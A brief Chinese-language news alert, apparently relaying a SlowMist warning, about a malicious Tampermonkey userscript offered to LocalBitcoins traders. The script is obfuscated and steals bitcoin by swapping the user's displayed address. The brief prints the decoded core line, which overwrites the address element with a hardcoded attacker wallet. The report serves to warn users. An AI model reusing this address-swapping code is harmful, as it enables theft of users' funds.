点击图片查看原图
区快洞察消息,据慢雾区情报反馈,有人在 LocalBitcoins 进行交易时,被诱骗使用了一段所谓增强的 Javascript 插件导致被盗比特币,该 Javascript 插件可以在浏览器知名扩展 Tampermonkey (油猴)上方便使用。一旦使用,该恶意 Javascript 即可篡改用户在 LocalBitcoins 上的比特币地址,达到劫持盗币攻击的目的。这段恶意 Javascript 代码进行了多层加密与加花处理,肉眼看不出恶意行为,通过 xssor.io 进行解密后可以清晰看到「劫持盗币」的核心代码:document[_0x66e1x6("0x0")]("bitcoin-address bitcoin-address-controls")[0]["innerHTML"] = "1Ak8db781gfM3QutGwFsKuZg7YeUEoCvPw。
